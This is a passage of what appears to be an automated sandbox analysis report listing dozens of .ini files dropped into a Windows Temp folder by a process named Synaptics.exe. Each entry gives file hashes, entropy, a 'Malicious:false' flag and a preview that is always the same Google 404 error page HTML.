                                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="1iVSOOUawLYXIyrwNzpQfg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\NvhwI3w.ini

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.266245263268218
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0Lh5SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+a5+pAZewRDK4mW
                                                                                                                                                      MD5:F14DE6D0ABF3300CE6E937560139321B
                                                                                                                                                      SHA1:3A6E606B8ECED31EA7935F1E0B5F1CF2D035AF50
                                                                                                                                                      SHA-256:B5B9A3644416FF3F678A4A5D31DA6E94E1DE95912E717DAA2432A5DA3BE61FF6
                                                                                                                                                      SHA-512:F3EDD290047EFF6EA276B7A2D5E6EE459B3A6E3DA3C55698301907700CE1F1C79E513CF9F0F827696353D61E33394B0BDEFC4A8A72543BAA8C11B39C213B5626
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="FtGDfl_V08ugXZVrm4HJzQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\RayYTfb.ini

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.255469822975438
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0O3SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+V+pAZewRDK4mW
                                                                                                                                                      MD5:415F218C178A35FB27712C85453EBE0B
                                                                                                                                                      SHA1:1BA80B472D6281CB862B02D150856AE84DED9531
                                                                                                                                                      SHA-256:BC52D69DB6379CEE7C76E0E594B7F2293625159393072448E3DB3FF7DFC8B9A2
                                                                                                                                                      SHA-512:8202826202B5C976B26E634342F7597CAEAFB18108E72DF6860C7F9D251E78A4A21FC9F9870540117B53961572F25876B418E3DC4A0DCCA7CDD1454AB3B8DFA6
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="iNNMc5V7mX-_Pmme2U-3tA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\UX31etx.ini

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.269393246642785
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+01SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+W+pAZewRDK4mW
                                                                                                                                                      MD5:7740A1ACCA416357940C22F3CF9879A2
                                                                                                                                                      SHA1:9E1E41FF9B0CCF2EC90A3FD4ABEDCA4D3411B9E8
                                                                                                                                                      SHA-256:2CEEB2DD3D3700379A0DE1FAD49ABF9EC1F834908511049566B5E2893A80268B
                                                                                                                                                      SHA-512:0DE3ABCA1C0EF26872E272BB2986406FFC50442D92986EBE8C7C3B7B88BFDD1F4E0976CB4F83A321A62EAB8B5BECFC0AD76424780C5A729032342A33D2CD1856
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="m4D8z7Vy7RDqlbK1B6sJWg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\WOG3KXC.ini

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.276795087454647
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0AZSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+d+pAZewRDK4mW
                                                                                                                                                      MD5:0CA8DD34BD7C87F2EE6F0AC1855E2386
                                                                                                                                                      SHA1:BEE0C1AC613385726BCCC1354F59CBA555A0D092
                                                                                                                                                      SHA-256:847CDB02C9A5637AA2875E09DB29E682324896D510E71DCEF1052064789D6CF1
                                                                                                                                                      SHA-512:E74D128D775A1F2EE4D3AFF314025CC99512BB1242E03B23203231BDC8C8250F4B3CB74C178757E08B43EB3ED41B8965ABEBB3F7231867763DCA7E040649226B
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="jDZAOr7sPoq3U-QJSzM-Ig">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\XDInR1C.ini

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.2621555942790685
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0r+SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+W++pAZewRDK4mW
                                                                                                                                                      MD5:5BB55000B3D9263E1C06B6DD57FB263C
                                                                                                                                                      SHA1:1095724D440F623C409BAA4A12BFD7123AF61C34
                                                                                                                                                      SHA-256:6419FD642772FCDC82F763E59A795452A55C739B4F0CA72A5D82D3EF537842A1
                                                                                                                                                      SHA-512:37A7DD6935AE189C7AD60F952A7769D13C1C819B4ADB571D04BBFD4410CA73923DFC8DE19D91572629210EF6CC8942CB08F83FD2AE1D66085DBF66EE7E7AACDF
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="bliSE4Qh8g2sUOslXWU7FA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\XRustTH.ini

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.252379309720784
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0gebSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+8+pAZewRDK4mW
                                                                                                                                                      MD5:59C577968304E1AB83EE263FE7A09E4D
                                                                                                                                                      SHA1:DA21FDD0B4A2FE1B7C435F640543AA359BCEAE75
                                                                                                                                                      SHA-256:4658B71A0B675DAF6DCFD3FBA9DF983686A4F089194C7CF36759CA536404B495
                                                                                                                                                      SHA-512:6E4484B14F60133A6820628F0F10AEAC35470D4E6CA72347305B43B037E158AB88B93004572E0F5C9F019469F41E91D5622F79E4DFC7CF9E536BC87C303ACF86
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ssY-2Gk5iazL2Pb2ndOSdQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\XyfT62B.ini

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.2567700410909035
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0mqeSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Jqe+pAZewRDK4mW
                                                                                                                                                      MD5:F32D060ED45939E4261155DA64B10E47
                                                                                                                                                      SHA1:83BEE91B8CC91555F393B617BD4F69E9016D1EEB
                                                                                                                                                      SHA-256:3B8F4D3B4CB6ABA9362F93733EBAAE6FC411CCB46F0C0F8D845DB4287D6B4ECC
                                                                                                                                                      SHA-512:FFB53AA3A4AACB59B54480B516C1490E4E432AB8F9CA8B08FCCE2840F7E20A66940F02D027FC1CD2CB15C9103C97BE4EFBA916AF0F87D7BE527E33D6E20356B4
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="cnMGFqU-Qip5Z4iv1EUwJg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\YKfwCNV.ini

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.272758135258359
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0QgrmXSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+SmX+pAZewRDK4mW
                                                                                                                                                      MD5:926A205BFBBB6234086BA165D06FDACE
                                                                                                                                                      SHA1:04A4592F89BC660752B2796361FBD9532DDB75D4
                                                                                                                                                      SHA-256:25F0CDD4BBE79252C7D74ECCC0E355D1164CC65D72733DBDB1DA0EDB38EEAE6A
                                                                                                                                                      SHA-512:25B3CD2BDB22DEDFCCDD1CD6CF7FDC82D18F4C5BC6D959FE947A9F461013DF01F4E6F6EB7CFD4B0A99BB10306A7DF7B31D42E22CBE6A4763CB4E6F1566B0A867
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="kDBSZAyvt9B6QnIQ08TbBg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\ZWrBZZV.ini

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.257771324811607
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0cwSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+i+pAZewRDK4mW
                                                                                                                                                      MD5:D9E74E4F6A90FA1F1B6D765B4132E8B6
                                                                                                                                                      SHA1:586B043791022F2DB765199E27AF666D94379DCF
                                                                                                                                                      SHA-256:9B1786D8CD434ABF0760D17965A13351DD5E4E0A7E3F0EFCEBA8100CE29F2C56
                                                                                                                                                      SHA-512:5CD649A07842FD4F1FE463EEBFAA21CC9C9F0E0173FA72BD3E9F40EED237660BAD4DB7C9E14429F2CE0CFBBDEED9CEF247A7E5F57EB7DFBE5279458619745C23
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="8AkNfx-Jef750JD4kUN_Tg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\a6SzGYS.ini

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.246584371161457
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+07SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+0+pAZewRDK4mW
                                                                                                                                                      MD5:827996A2517AD36844C3E2D580C370EA
                                                                                                                                                      SHA1:958ADA10C084E7FB6EB2134E403935CAD5BDDA86
                                                                                                                                                      SHA-256:BAB087F40F0BB15F7275CE15625CF82DD624A3F9CE4E978D24C2065015D92EB5
                                                                                                                                                      SHA-512:E4388E2FDF04E853C91F334C8F1F9273D613ADF2C438B2C5E53D711943746E1271654DA50C436AFD4DEFA92FD91080EB655E40ADA3B239968014B081E12DAD41
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="twJkxO6genx1hsgmdt3BAA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\aVxsfgT.ini

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.256657188390123
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0OL2SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+HL2+pAZewRDK4mW
                                                                                                                                                      MD5:92B98733BEC7B79B97F97B4B8034DAF3
                                                                                                                                                      SHA1:CF3521E775363AFEDBA010FEC08A24F59F36477E
                                                                                                                                                      SHA-256:4A398F603AE71E677C1A2335621E12137467FD363CEBD3F4BF65EE6237AEC666
                                                                                                                                                      SHA-512:39C2171F0423A071886F8187E75B8FE22319FEB71D29495B8F95CE86B757E70D0376124C873A0BE4E621EEDA91978ACF22D555F677591B150FE82046B356D4F9
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="5qicNOio7jJj-oLT_Edk2A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\dZaipqI.ini

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.2813278631420095
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0rSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+0+pAZewRDK4mW
                                                                                                                                                      MD5:0566ED649D99BECEE132E85B0868C5FC
                                                                                                                                                      SHA1:9923275D5FC0B641E100B95F76CC33476B28D04C
                                                                                                                                                      SHA-256:7A9CD58368B241437AA449E4DA2A53CE4238FA5E491895CA1E775EF4B553C10A
                                                                                                                                                      SHA-512:231DE2234B047F6AD363518A891791694609D5F757EBD390336B30A130D0B140100A245B98838AE3BCFAE81EA45942DE5BCF729106EA7D7132650AF0B42A701F
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="YPW7fSDXQyJnjE3U-P40GA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\fBQugze.ini

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.2683054930735205
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0kFSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+/+pAZewRDK4mW
                                                                                                                                                      MD5:12E99A634B05BFE900E903052CCDF0D8
                                                                                                                                                      SHA1:2A2D6FE409DBC0AC176B500500345D2DF0AE85CB
                                                                                                                                                      SHA-256:D02E8ED792BE004738EB0B684DCC84B324592C2D1B39BD4DDA4384E66CB9FD2E
                                                                                                                                                      SHA-512:DD757C01536F5496A88317819EBD1130FD83F1EA69F97EB50702E5D87FDD42CD3F518DC6BED1F77264C9AD392AF096FF0B66B6D47BEC674C83BDAD0608BA3064
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="BKlp4gK4ypvjCVoFF6xO3Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\fkCg4qJ.ini

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.241812556524698
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0a1SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+t1+pAZewRDK4mW
                                                                                                                                                      MD5:019526238A9B18D4D812475477BB95F7
                                                                                                                                                      SHA1:E3B2DA601E3B73D6D91B6900F3E5FCFF96F4F8B1
                                                                                                                                                      SHA-256:2C587738E7C6222ED9C1A5D231AD03DF865DF2DD90AE99C579C004048B76D44A
                                                                                                                                                      SHA-512:DD1E5AE80BB9CFE5D65E6F5A209E846D067C31AE8DD80475B9D3B1C0E096DB0EC8083EFCCAEA82AB7C974490150A4A063D974A6E5BF9A037586AA4096961EA04
                                                                                                                                                      Malicious:false
